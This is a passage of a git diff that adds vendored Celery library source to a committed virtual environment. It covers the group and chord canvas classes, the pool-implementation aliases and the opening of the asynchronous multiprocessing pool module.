options, group_id, root_id = self._freeze_gid(options) + tasks = self._prepared(self.tasks, [], group_id, root_id, app) + return app.GroupResult(group_id, [ + sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks + ]) + + def set_immutable(self, immutable): + for task in self.tasks: + task.set_immutable(immutable) + + def stamp(self, visitor=None, append_stamps=False, **headers): + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_group_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, append_stamps, **headers) + + if isinstance(self.tasks, _regen): + self.tasks.map(_partial(_stamp_regen_task, visitor=visitor, append_stamps=append_stamps, **headers)) + else: + new_tasks = [] + for task in self.tasks: + task = maybe_signature(task, app=self.app) + task.stamp(visitor, append_stamps, **headers) + new_tasks.append(task) + if isinstance(self.tasks, MutableSequence): + self.tasks[:] = new_tasks + else: + self.tasks = new_tasks + + if visitor is not None: + visitor.on_group_end(self, **headers) + + def link(self, sig): + # Simply link to first task. Doing this is slightly misleading because + # the callback may be executed before all children in the group are + # completed and also if any children other than the first one fail. + # + # The callback signature is cloned and made immutable since it the + # first task isn't actually capable of passing the return values of its + # siblings to the callback task. + sig = sig.clone().set(immutable=True) + return self.tasks[0].link(sig) + + def link_error(self, sig): + # Any child task might error so we need to ensure that they are all + # capable of calling the linked error signature. This opens the + # possibility that the task is called more than once but that's better + # than it not being called at all. + # + # We return a concretised tuple of the signatures actually applied to + # each child task signature, of which there might be none! + return tuple(child_task.link_error(sig.clone(immutable=True)) for child_task in self.tasks) + + def _prepared(self, tasks, partial_args, group_id, root_id, app, + CallableSignature=abstract.CallableSignature, + from_dict=Signature.from_dict, + isinstance=isinstance, tuple=tuple): + """Recursively unroll the group into a generator of its tasks. + + This is used by :meth:`apply_async` and :meth:`apply` to + unroll the group into a list of tasks that can be evaluated. + + Note: + This does not change the group itself, it only returns + a generator of the tasks that the group would evaluate to. + + Arguments: + tasks (list): List of tasks in the group (may contain nested groups). + partial_args (list): List of arguments to be prepended to + the arguments of each task. + group_id (str): The group id of the group. + root_id (str): The root id of the group. + app (Celery): The Celery app instance. + CallableSignature (class): The signature class of the group's tasks. + from_dict (fun): Function to create a signature from a dict. + isinstance (fun): Function to check if an object is an instance + of a class. + tuple (class): A tuple-like class. + + Returns: + generator: A generator for the unrolled group tasks. + The generator yields tuples of the form ``(task, AsyncResult, group_id)``. + """ + for index, task in enumerate(tasks): + if isinstance(task, CallableSignature): + # local sigs are always of type Signature, and we + # clone them to make sure we don't modify the originals. + task = task.clone() + else: + # serialized sigs must be converted to Signature. + task = from_dict(task, app=app) + if isinstance(task, group): + # needs yield_from :( + unroll = task._prepared( + task.tasks, partial_args, group_id, root_id, app, + ) + yield from unroll + else: + if partial_args and not task.immutable: + task.args = tuple(partial_args) + tuple(task.args) + yield task, task.freeze(group_id=group_id, root_id=root_id, group_index=index), group_id + + def _apply_tasks(self, tasks, producer=None, app=None, p=None, + add_to_parent=None, chord=None, + args=None, kwargs=None, **options): + """Run all the tasks in the group. + + This is used by :meth:`apply_async` to run all the tasks in the group + and return a generator of their results. + + Arguments: + tasks (list): List of tasks in the group. + producer (Producer): The producer to use to publish the tasks. + app (Celery): The Celery app instance. + p (barrier): Barrier object to synchronize the tasks results. + args (list): List of arguments to be prepended to + the arguments of each task. + kwargs (dict): Dict of keyword arguments to be merged with + the keyword arguments of each task. + **options (dict): Options to be merged with the options of each task. + + Returns: + generator: A generator for the AsyncResult of the tasks in the group. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + app = app or self.app + with app.producer_or_acquire(producer) as producer: + # Iterate through tasks two at a time. If tasks is a generator, + # we are able to tell when we are at the end by checking if + # next_task is None. This enables us to set the chord size + # without burning through the entire generator. See #3021. + chord_size = 0 + tasks_shifted, tasks = itertools.tee(tasks) + next(tasks_shifted, None) + next_task = next(tasks_shifted, None) + + for task_index, current_task in enumerate(tasks): + # We expect that each task must be part of the same group which + # seems sensible enough. If that's somehow not the case we'll + # end up messing up chord counts and there are all sorts of + # awful race conditions to think about. We'll hope it's not! + sig, res, group_id = current_task + chord_obj = chord if chord is not None else sig.options.get("chord") + # We need to check the chord size of each contributing task so + # that when we get to the final one, we can correctly set the + # size in the backend and the chord can be sensible completed. + chord_size += _chord._descend(sig) + if chord_obj is not None and next_task is None: + # Per above, sanity check that we only saw one group + app.backend.set_chord_size(group_id, chord_size) + sig.apply_async(producer=producer, add_to_parent=False, + chord=chord_obj, args=args, kwargs=kwargs, + **options) + # adding callback to result, such that it will gradually + # fulfill the barrier. + # + # Using barrier.add would use result.then, but we need + # to add the weak argument here to only create a weak + # reference to the object. + if p and not p.cancelled and not p.ready: + p.size += 1 + res.then(p, weak=True) + next_task = next(tasks_shifted, None) + yield res # <-- r.parent, etc set in the frozen result. + + def _freeze_gid(self, options): + """Freeze the group id by the existing task_id or a new UUID.""" + # remove task_id and use that as the group_id, + # if we don't remove it then every task will have the same id... + options = {**self.options, **{ + k: v for k, v in options.items() + if k not in self._IMMUTABLE_OPTIONS or k not in self.options + }} + options['group_id'] = group_id = ( + options.pop('task_id', uuid())) + return options, group_id, options.get('root_id') + + def _freeze_group_tasks(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + """Freeze the tasks in the group. + + Note: + If the group tasks are created from a generator, the tasks generator would + not be exhausted, and the tasks would be frozen lazily. + + Returns: + tuple: A tuple of the group id, and the AsyncResult of each of the group tasks. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + opts = self.options + try: + gid = opts['task_id'] + except KeyError: + gid = opts['task_id'] = group_id or uuid() + if group_id: + opts['group_id'] = group_id + if chord: + opts['chord'] = chord + if group_index is not None: + opts['group_index'] = group_index + root_id = opts.setdefault('root_id', root_id) + parent_id = opts.setdefault('parent_id', parent_id) + if isinstance(self.tasks, _regen): + # When the group tasks are a generator, we need to make sure we don't + # exhaust it during the freeze process. We use two generators to do this. + # One generator will be used to freeze the tasks to get their AsyncResult. + # The second generator will be used to replace the tasks in the group with an unexhausted state. + + # Create two new generators from the original generator of the group tasks (cloning the tasks). + tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks)) + # Use the first generator to freeze the group tasks to acquire the AsyncResult for each task. + results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id)) + # Use the second generator to replace the exhausted generator of the group tasks. + self.tasks = regen(tasks2) + else: + new_tasks = [] + # Need to unroll subgroups early so that chord gets the + # right result instance for chord_unlock etc. + results = list(self._freeze_unroll( + new_tasks, group_id, chord, root_id, parent_id, + )) + if isinstance(self.tasks, MutableSequence): + self.tasks[:] = new_tasks + else: + self.tasks = new_tasks + return gid, results + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + return self.app.GroupResult(*self._freeze_group_tasks( + _id=_id, group_id=group_id, + chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index + )) + + _freeze = freeze + + def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id): + """Creates a generator for the AsyncResult of each task in the tasks argument.""" + yield from (task.freeze(group_id=group_id, + chord=chord, + root_id=root_id, + parent_id=parent_id, + group_index=group_index) + for group_index, task in enumerate(tasks)) + + def _unroll_tasks(self, tasks): + """Creates a generator for the cloned tasks of the tasks argument.""" + # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks) + yield from (maybe_signature(task, app=self._app).clone() for task in tasks) + + def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id): + """Generator for the frozen flattened group tasks. + + Creates a flattened list of the tasks in the group, and freezes + each task in the group. Nested groups will be recursively flattened. + + Exhausting the generator will create a new list of the flattened + tasks in the group and will return it in the new_tasks argument. + + Arguments: + new_tasks (list): The list to append the flattened tasks to. + group_id (str): The group_id to use for the tasks. + chord (Chord): The chord to use for the tasks. + root_id (str): The root_id to use for the tasks. + parent_id (str): The parent_id to use for the tasks. + + Yields: + AsyncResult: The frozen task. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + stack = deque(self.tasks) + group_index = 0 + while stack: + task = maybe_signature(stack.popleft(), app=self._app).clone() + # if this is a group, flatten it by adding all of the group's tasks to the stack + if isinstance(task, group): + stack.extendleft(task.tasks) + else: + new_tasks.append(task) + yield task.freeze(group_id=group_id, + chord=chord, root_id=root_id, + parent_id=parent_id, + group_index=group_index) + group_index += 1 + + def __repr__(self): + if self.tasks: + return remove_repeating_from_task( + self.tasks[0]['task'], + f'group({self.tasks!r})') + return 'group()' + + def __len__(self): + return len(self.tasks) + + @property + def app(self): + app = self._app + if app is None: + try: + app = self.tasks[0].app + except LookupError: + pass + return app if app is not None else current_app + + +@Signature.register_type(name="chord") +class _chord(Signature): + r"""Barrier synchronization primitive. + + A chord consists of a header and a body. + + The header is a group of tasks that must complete before the callback is + called. A chord is essentially a callback for a group of tasks. + + The body is applied with the return values of all the header + tasks as a list. + + Example: + + The chord: + + .. code-block:: pycon + + >>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s()) + + is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`: + + .. code-block:: pycon + + >>> res.get() + 12 + """ + + @classmethod + def from_dict(cls, d, app=None): + """Create a chord signature from a dictionary that represents a chord. + + Example: + >>> chord_dict = { + "task": "celery.chord", + "args": [], + "kwargs": { + "kwargs": {}, + "header": [ + { + "task": "add", + "args": [ + 1, + 2 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + }, + { + "task": "add", + "args": [ + 3, + 4 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + ], + "body": { + "task": "xsum", + "args": [], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + }, + "options": {}, + "subtask_type": "chord", + "immutable": False + } + >>> chord_sig = chord.from_dict(chord_dict) + + Iterates over the given tasks in the dictionary and convert them to signatures. + Chord header needs to be defined in d['kwargs']['header'] as a sequence + of tasks. + Chord body needs to be defined in d['kwargs']['body'] as a single task. + + The tasks themselves can be dictionaries or signatures (or both). + """ + options = d.copy() + args, options['kwargs'] = cls._unpack_args(**options['kwargs']) + return cls(*args, app=app, **options) + + @staticmethod + def _unpack_args(header=None, body=None, **kwargs): + # Python signatures are better at extracting keys from dicts + # than manually popping things off. + return (header, body), kwargs + + def __init__(self, header, body=None, task='celery.chord', + args=None, kwargs=None, app=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {'kwargs': {}} + super().__init__(task, args, + {**kwargs, 'header': _maybe_group(header, app), + 'body': maybe_signature(body, app=app)}, app=app, **options + ) + self.subtask_type = 'chord' + + def __call__(self, body=None, **options): + return self.apply_async((), {'body': body} if body else {}, **options) + + def __or__(self, other): + if (not isinstance(other, (group, _chain)) and + isinstance(other, Signature)): + # chord | task -> attach to body + sig = self.clone() + sig.body = sig.body | other + return sig + elif isinstance(other, group) and len(other.tasks) == 1: + # chord | group -> chain with chord body. + # unroll group with one member + other = maybe_unroll_group(other) + sig = self.clone() + sig.body = sig.body | other + return sig + else: + return super().__or__(other) + + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + if not isinstance(self.tasks, group): + self.tasks = group(self.tasks, app=self.app) + # first freeze all tasks in the header + header_result = self.tasks.freeze( + parent_id=parent_id, root_id=root_id, chord=self.body) + self.id = self.tasks.id + # secondly freeze all tasks in the body: those that should be called after the header + + body_result = None + if self.body: + body_result = self.body.freeze( + _id, root_id=root_id, chord=chord, group_id=group_id, + group_index=group_index) + # we need to link the body result back to the group result, + # but the body may actually be a chain, + # so find the first result without a parent + node = body_result + seen = set() + while node: + if node.id in seen: + raise RuntimeError('Recursive result parents') + seen.add(node.id) + if node.parent is None: + node.parent = header_result + break + node = node.parent + + return body_result + + def stamp(self, visitor=None, append_stamps=False, **headers): + tasks = self.tasks + if isinstance(tasks, group): + tasks = tasks.tasks + + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_chord_header_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, append_stamps, **headers) + + if isinstance(tasks, _regen): + tasks.map(_partial(_stamp_regen_task, visitor=visitor, append_stamps=append_stamps, **headers)) + else: + stamps = headers.copy() + for task in tasks: + task.stamp(visitor, append_stamps, **stamps) + + if visitor is not None: + visitor.on_chord_header_end(self, **headers) + + if visitor is not None and self.body is not None: + visitor_headers = visitor.on_chord_body(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.body.stamp(visitor, append_stamps, **headers) + + def apply_async(self, args=None, kwargs=None, task_id=None, + producer=None, publisher=None, connection=None, + router=None, result_cls=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + args = (tuple(args) + tuple(self.args) + if args and not self.immutable else self.args) + body = kwargs.pop('body', None) or self.kwargs['body'] + kwargs = dict(self.kwargs['kwargs'], **kwargs) + body = body.clone(**options) + app = self._get_app(body) + tasks = (self.tasks.clone() if isinstance(self.tasks, group) + else group(self.tasks, app=app, task_id=self.options.get('task_id', uuid()))) + if app.conf.task_always_eager: + with allow_join_result(): + return self.apply(args, kwargs, + body=body, task_id=task_id, **options) + + merged_options = dict(self.options, **options) if options else self.options + option_task_id = merged_options.pop("task_id", None) + if task_id is None: + task_id = option_task_id + + # chord([A, B, ...], C) + return self.run(tasks, body, args, task_id=task_id, kwargs=kwargs, **merged_options) + + def apply(self, args=None, kwargs=None, + propagate=True, body=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + body = self.body if body is None else body + tasks = (self.tasks.clone() if isinstance(self.tasks, group) + else group(self.tasks, app=self.app)) + return body.apply( + args=(tasks.apply(args, kwargs).get(propagate=propagate),), + ) + + @classmethod + def _descend(cls, sig_obj): + """Count the number of tasks in the given signature recursively. + + Descend into the signature object and return the amount of tasks it contains. + """ + # Sometimes serialized signatures might make their way here + if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict): + sig_obj = Signature.from_dict(sig_obj) + if isinstance(sig_obj, group): + # Each task in a group counts toward this chord + subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks) + return sum(cls._descend(task) for task in subtasks) + elif isinstance(sig_obj, _chain): + # The last non-empty element in a chain counts toward this chord + for child_sig in sig_obj.tasks[-1::-1]: + child_size = cls._descend(child_sig) + if child_size > 0: + return child_size + # We have to just hope this chain is part of some encapsulating + # signature which is valid and can fire the chord body + return 0 + elif isinstance(sig_obj, chord): + # The child chord's body counts toward this chord + return cls._descend(sig_obj.body) + elif isinstance(sig_obj, Signature): + # Each simple signature counts as 1 completion for this chord + return 1 + # Any other types are assumed to be iterables of simple signatures + return len(sig_obj) + + def __length_hint__(self): + """Return the number of tasks in this chord's header (recursively).""" + tasks = getattr(self.tasks, "tasks", self.tasks) + return sum(self._descend(task) for task in tasks) + + def run(self, header, body, partial_args, app=None, interval=None, + countdown=1, max_retries=None, eager=False, + task_id=None, kwargs=None, **options): + """Execute the chord. + + Executing the chord means executing the header and sending the + result to the body. In case of an empty header, the body is + executed immediately. + + Arguments: + header (group): The header to execute. + body (Signature): The body to execute. + partial_args (tuple): Arguments to pass to the header. + app (Celery): The Celery app instance. + interval (float): The interval between retries. + countdown (int): The countdown between retries. + max_retries (int): The maximum number of retries. + task_id (str): The task id to use for the body. + kwargs (dict): Keyword arguments to pass to the header. + options (dict): Options to pass to the header. + + Returns: + AsyncResult: The result of the body (with the result of the header in the parent of the body). + """ + app = app or self._get_app(body) + group_id = header.options.get('task_id') or uuid() + root_id = body.options.get('root_id') + options = dict(self.options, **options) if options else self.options + if options: + options.pop('task_id', None) + body.options.update(options) + + bodyres = body.freeze(task_id, root_id=root_id) + + # Chains should not be passed to the header tasks. See #3771 + options.pop('chain', None) + # Neither should chords, for deeply nested chords to work + options.pop('chord', None) + options.pop('task_id', None) + + header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id) + + if header.tasks: + app.backend.apply_chord( + header_result_args, + body, + interval=interval, + countdown=countdown, + max_retries=max_retries, + ) + header_result = header.apply_async(partial_args, kwargs, task_id=group_id, **options) + # The execution of a chord body is normally triggered by its header's + # tasks completing. If the header is empty this will never happen, so + # we execute the body manually here. + else: + body.delay([]) + header_result = self.app.GroupResult(*header_result_args) + + bodyres.parent = header_result + return bodyres + + def clone(self, *args, **kwargs): + signature = super().clone(*args, **kwargs) + # need to make copy of body + try: + signature.kwargs['body'] = maybe_signature( + signature.kwargs['body'], clone=True) + except (AttributeError, KeyError): + pass + return signature + + def link(self, callback): + """Links a callback to the chord body only.""" + self.body.link(callback) + return callback + + def link_error(self, errback): + """Links an error callback to the chord body, and potentially the header as well. + + Note: + The ``task_allow_error_cb_on_chord_header`` setting controls whether + error callbacks are allowed on the header. If this setting is + ``False`` (the current default), then the error callback will only be + applied to the body. + """ + if self.app.conf.task_allow_error_cb_on_chord_header: + for task in maybe_list(self.tasks) or []: + task.link_error(errback.clone(immutable=True)) + else: + # Once this warning is removed, the whole method needs to be refactored to: + # 1. link the error callback to each task in the header + # 2. link the error callback to the body + # 3. return the error callback + # In summary, up to 4 lines of code + updating the method docstring. + warnings.warn( + "task_allow_error_cb_on_chord_header=False is pending deprecation in " + "a future release of Celery.\n" + "Please test the new behavior by setting task_allow_error_cb_on_chord_header to True " + "and report any concerns you might have in our issue tracker before we make a final decision " + "regarding how errbacks should behave when used with chords.", + CPendingDeprecationWarning + ) + + self.body.link_error(errback) + return errback + + def set_immutable(self, immutable): + """Sets the immutable flag on the chord header only. + + Note: + Does not affect the chord body. + + Arguments: + immutable (bool): The new mutability value for chord header. + """ + for task in self.tasks: + task.set_immutable(immutable) + + def __repr__(self): + if self.body: + if isinstance(self.body, _chain): + return remove_repeating_from_task( + self.body.tasks[0]['task'], + '%({} | {!r})'.format( + self.body.tasks[0].reprcall(self.tasks), + chain(self.body.tasks[1:], app=self._app), + ), + ) + return '%' + remove_repeating_from_task( + self.body['task'], self.body.reprcall(self.tasks)) + return f'' + + @cached_property + def app(self): + return self._get_app(self.body) + + def _get_app(self, body=None): + app = self._app + if app is None: + try: + tasks = self.tasks.tasks # is a group + except AttributeError: + tasks = self.tasks + if tasks: + app = tasks[0]._app + if app is None and body is not None: + app = body._app + return app if app is not None else current_app + + tasks = getitem_property('kwargs.header', 'Tasks in chord header.') + body = getitem_property('kwargs.body', 'Body task of chord.') + + +# Add a back-compat alias for the previous `chord` class name which conflicts +# with keyword arguments elsewhere in this file +chord = _chord + + +def signature(varies, *args, **kwargs): + """Create new signature. + + - if the first argument is a signature already then it's cloned. + - if the first argument is a dict, then a Signature version is returned. + + Returns: + Signature: The resulting signature. + """ + app = kwargs.get('app') + if isinstance(varies, dict): + if isinstance(varies, abstract.CallableSignature): + return varies.clone() + return Signature.from_dict(varies, app=app) + return Signature(varies, *args, **kwargs) + + +subtask = signature # XXX compat + + +def maybe_signature(d, app=None, clone=False): + """Ensure obj is a signature, or None. + + Arguments: + d (Optional[Union[abstract.CallableSignature, Mapping]]): + Signature or dict-serialized signature. + app (celery.Celery): + App to bind signature to. + clone (bool): + If d' is already a signature, the signature + will be cloned when this flag is enabled. + + Returns: + Optional[abstract.CallableSignature] + """ + if d is not None: + if isinstance(d, abstract.CallableSignature): + if clone: + d = d.clone() + elif isinstance(d, dict): + d = signature(d) + + if app is not None: + d._app = app + return d + + +maybe_subtask = maybe_signature # XXX compat diff --git a/env/Lib/site-packages/celery/concurrency/__init__.py b/env/Lib/site-packages/celery/concurrency/__init__.py new file mode 100644 index 00000000..4953f463 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/__init__.py @@ -0,0 +1,48 @@ +"""Pool implementation abstract factory, and alias definitions.""" +import os + +# Import from kombu directly as it's used +# early in the import stage, where celery.utils loads +# too much (e.g., for eventlet patching) +from kombu.utils.imports import symbol_by_name + +__all__ = ('get_implementation', 'get_available_pool_names',) + +ALIASES = { + 'prefork': 'celery.concurrency.prefork:TaskPool', + 'eventlet': 'celery.concurrency.eventlet:TaskPool', + 'gevent': 'celery.concurrency.gevent:TaskPool', + 'solo': 'celery.concurrency.solo:TaskPool', + 'processes': 'celery.concurrency.prefork:TaskPool', # XXX compat alias +} + +try: + import concurrent.futures # noqa +except ImportError: + pass +else: + ALIASES['threads'] = 'celery.concurrency.thread:TaskPool' +# +# Allow for an out-of-tree worker pool implementation. This is used as follows: +# +# - Set the environment variable CELERY_CUSTOM_WORKER_POOL to the name of +# an implementation of :class:`celery.concurrency.base.BasePool` in the +# standard Celery format of "package:class". +# - Select this pool using '--pool custom'. +# +try: + custom = os.environ.get('CELERY_CUSTOM_WORKER_POOL') +except KeyError: + pass +else: + ALIASES['custom'] = custom + + +def get_implementation(cls): + """Return pool implementation by name.""" + return symbol_by_name(cls, ALIASES) + + +def get_available_pool_names(): + """Return all available pool type names.""" + return tuple(ALIASES.keys()) diff --git a/env/Lib/site-packages/celery/concurrency/asynpool.py b/env/Lib/site-packages/celery/concurrency/asynpool.py new file mode 100644 index 00000000..c024e685 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/asynpool.py @@ -0,0 +1,1360 @@ +"""Version of multiprocessing.Pool using Async I/O. + +.. note:: + + This module will be moved soon, so don't use it directly. + +This is a non-blocking version of :class:`multiprocessing.Pool`. + +This code deals with three major challenges: + +#. Starting up child processes and keeping them running. +#. Sending jobs to the processes and receiving results back. +#. Safely shutting down this system. +""" +import errno +import gc +import inspect +import os +import select +import time +from collections import Counter, deque, namedtuple +from io import BytesIO +from numbers import Integral +from pickle import HIGHEST_PROTOCOL +from struct import pack, unpack, unpack_from +from time import sleep +from weakref import WeakValueDictionary, ref + +from billiard import pool as _pool +from billiard.compat import isblocking, setblocking +from billiard.pool import ACK, NACK, RUN, TERMINATE, WorkersJoined +from billiard.queues import _SimpleQueue +from kombu.asynchronous import ERR, WRITE +from kombu.serialization import pickle as _pickle +from kombu.utils.eventio import SELECT_BAD_FD +from kombu.utils.functional import fxrange +from vine import promise + +from celery.signals import worker_before_create_process +from celery.utils.functional import noop +from celery.utils.log import get_logger +from celery.worker import state as worker_state + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + +try: + from _billiard import read as __read__ + readcanbuf = True + +except ImportError: + + def __read__(fd, buf, size, read=os.read): + chunk = read(fd, size) + n = len(chunk) + if n != 0: + buf.write(chunk) + return n + readcanbuf = False + + def unpack_from(fmt, iobuf, unpack=unpack): # noqa + return unpack(fmt, iobuf.getvalue()) # <-- BytesIO + +__all__ = ('AsynPool',) + +logger = get_logger(__name__) +error, debug = logger.error, logger.debug + +UNAVAIL = frozenset({errno.EAGAIN, errno.EINTR}) + +#: Constant sent by child process when started (ready to accept work) +WORKER_UP = 15 + +#: A process must've started before this timeout (in secs.) expires. +PROC_ALIVE_TIMEOUT = 4.0 + +SCHED_STRATEGY_FCFS = 1 +SCHED_STRATEGY_FAIR = 4 + +SCHED_STRATEGIES = { + None: SCHED_STRATEGY_FAIR, + 'default': SCHED_STRATEGY_FAIR, + 'fast': SCHED_STRATEGY_FCFS, + 'fcfs': SCHED_STRATEGY_FCFS, + 'fair': SCHED_STRATEGY_FAIR, +} +SCHED_STRATEGY_TO_NAME = {v: k for k, v in SCHED_STRATEGIES.items()} + +Ack = namedtuple('Ack', ('id', 'fd', 'payload')) + + +def gen_not_started(gen): + """Return true if generator is not started.""" + return inspect.getgeneratorstate(gen) == "GEN_CREATED" + + +def _get_job_writer(job): + try: + writer = job._writer + except AttributeError: + pass + else: + return writer() # is a weakref + + +if hasattr(select, 'poll'): + def _select_imp(readers=None, writers=None, err=None, timeout=0, + poll=select.poll, POLLIN=select.POLLIN, + POLLOUT=select.POLLOUT, POLLERR=select.POLLERR): + poller = poll() + register = poller.register + + if readers: + [register(fd, POLLIN) for fd in readers] + if writers: + [register(fd, POLLOUT) for fd in writers] + if err: + [register(fd, POLLERR) for fd in err] + + R, W = set(), set() + timeout = 0 if timeout and timeout < 0 else round(timeout * 1e3) + events = poller.poll(timeout) + for fd, event in events: + if not isinstance(fd, Integral): + fd = fd.fileno() + if event & POLLIN: + R.add(fd) + if event & POLLOUT: + W.add(fd) + if event & POLLERR: + R.add(fd) + return R, W, 0 +else: + def _select_imp(readers=None, writers=None, err=None, timeout=0): + r, w, e = select.select(readers, writers, err, timeout) + if e: + r = list(set(r) | set(e)) + return r, w, 0 + + +def _select(readers=None, writers=None, err=None, timeout=0, + poll=_select_imp): + """Simple wrapper to :class:`~select.select`, using :`~select.poll`. + + Arguments: + readers (Set[Fd]): Set of reader fds to test if readable. + writers (Set[Fd]): Set of writer fds to test if writable. + err (Set[Fd]): Set of fds to test for error condition. + + All fd sets passed must be mutable as this function + will remove non-working fds from them, this also means + the caller must make sure there are still fds in the sets + before calling us again. + + Returns: + Tuple[Set, Set, Set]: of ``(readable, writable, again)``, where + ``readable`` is a set of fds that have data available for read, + ``writable`` is a set of fds that's ready to be written to + and ``again`` is a flag that if set means the caller must + throw away the result and call us again. + """ + readers = set() if readers is None else readers + writers = set() if writers is None else writers + err = set() if err is None else err + try: + return poll(readers, writers, err, timeout) + except OSError as exc: + _errno = exc.errno + + if _errno == errno.EINTR: + return set(), set(), 1 + elif _errno in SELECT_BAD_FD: + for fd in readers | writers | err: + try: + select.select([fd], [], [], 0) + except OSError as exc: + _errno = exc.errno + + if _errno not in SELECT_BAD_FD: + raise + readers.discard(fd) + writers.discard(fd) + err.discard(fd) + return set(), set(), 1 + else: + raise + + +def iterate_file_descriptors_safely(fds_iter, source_data, + hub_method, *args, **kwargs): + """Apply hub method to fds in iter, remove from list if failure. + + Some file descriptors may become stale through OS reasons + or possibly other reasons, so safely manage our lists of FDs. + :param fds_iter: the file descriptors to iterate and apply hub_method + :param source_data: data source to remove FD if it renders OSError + :param hub_method: the method to call with with each fd and kwargs + :*args to pass through to the hub_method; + with a special syntax string '*fd*' represents a substitution + for the current fd object in the iteration (for some callers). + :**kwargs to pass through to the hub method (no substitutions needed) + """ + def _meta_fd_argument_maker(): + # uses the current iterations value for fd + call_args = args + if "*fd*" in call_args: + call_args = [fd if arg == "*fd*" else arg for arg in args] + return call_args + # Track stale FDs for cleanup possibility + stale_fds = [] + for fd in fds_iter: + # Handle using the correct arguments to the hub method + hub_args, hub_kwargs = _meta_fd_argument_maker(), kwargs + try: # Call the hub method + hub_method(fd, *hub_args, **hub_kwargs) + except (OSError, FileNotFoundError): + logger.warning( + "Encountered OSError when accessing fd %s ", + fd, exc_info=True) + stale_fds.append(fd) # take note of stale fd + # Remove now defunct fds from the managed list + if source_data: + for fd in stale_fds: + try: + if hasattr(source_data, 'remove'): + source_data.remove(fd) + else: # then not a list/set ... try dict + source_data.pop(fd, None) + except ValueError: + logger.warning("ValueError trying to invalidate %s from %s", + fd, source_data) + + +class Worker(_pool.Worker): + """Pool worker process.""" + + def on_loop_start(self, pid): + # our version sends a WORKER_UP message when the process is ready + # to accept work, this will tell the parent that the inqueue fd + # is writable. + self.outq.put((WORKER_UP, (pid,))) + + +class ResultHandler(_pool.ResultHandler): + """Handles messages from the pool processes.""" + + def __init__(self, *args, **kwargs): + self.fileno_to_outq = kwargs.pop('fileno_to_outq') + self.on_process_alive = kwargs.pop('on_process_alive') + super().__init__(*args, **kwargs) + # add our custom message handler + self.state_handlers[WORKER_UP] = self.on_process_alive + + def _recv_message(self, add_reader, fd, callback, + __read__=__read__, readcanbuf=readcanbuf, + BytesIO=BytesIO, unpack_from=unpack_from, + load=_pickle.load): + Hr = Br = 0 + if readcanbuf: + buf = bytearray(4) + bufv = memoryview(buf) + else: + buf = bufv = BytesIO() + # header + + while Hr < 4: + try: + n = __read__( + fd, bufv[Hr:] if readcanbuf else bufv, 4 - Hr, + ) + except OSError as exc: + if exc.errno not in UNAVAIL: + raise + yield + else: + if n == 0: + raise (OSError('End of file during message') if Hr + else EOFError()) + Hr += n + + body_size, = unpack_from('>i', bufv) + if readcanbuf: + buf = bytearray(body_size) + bufv = memoryview(buf) + else: + buf = bufv = BytesIO() + + while Br < body_size: + try: + n = __read__( + fd, bufv[Br:] if readcanbuf else bufv, body_size - Br, + ) + except OSError as exc: + if exc.errno not in UNAVAIL: + raise + yield + else: + if n == 0: + raise (OSError('End of file during message') if Br + else EOFError()) + Br += n + add_reader(fd, self.handle_event, fd) + if readcanbuf: + message = load(BytesIO(bufv)) + else: + bufv.seek(0) + message = load(bufv) + if message: + callback(message) + + def _make_process_result(self, hub): + """Coroutine reading messages from the pool processes.""" + fileno_to_outq = self.fileno_to_outq + on_state_change = self.on_state_change + add_reader = hub.add_reader + remove_reader = hub.remove_reader + recv_message = self._recv_message + + def on_result_readable(fileno): + try: + fileno_to_outq[fileno] + except KeyError: # process gone + return remove_reader(fileno) + it = recv_message(add_reader, fileno, on_state_change) + try: + next(it) + except StopIteration: + pass + except (OSError, EOFError): + remove_reader(fileno) + else: + add_reader(fileno, it) + return on_result_readable + + def register_with_event_loop(self, hub): + self.handle_event = self._make_process_result(hub) + + def handle_event(self, *args): + # pylint: disable=method-hidden + # register_with_event_loop overrides this + raise RuntimeError('Not registered with event loop') + + def on_stop_not_started(self): + # This is always used, since we do not start any threads. + cache = self.cache + check_timeouts = self.check_timeouts + fileno_to_outq = self.fileno_to_outq + on_state_change = self.on_state_change + join_exited_workers = self.join_exited_workers + + # flush the processes outqueues until they've all terminated. + outqueues = set(fileno_to_outq) + while cache and outqueues and self._state != TERMINATE: + if check_timeouts is not None: + # make sure tasks with a time limit will time out. + check_timeouts() + # cannot iterate and remove at the same time + pending_remove_fd = set() + for fd in outqueues: + iterate_file_descriptors_safely( + [fd], self.fileno_to_outq, self._flush_outqueue, + 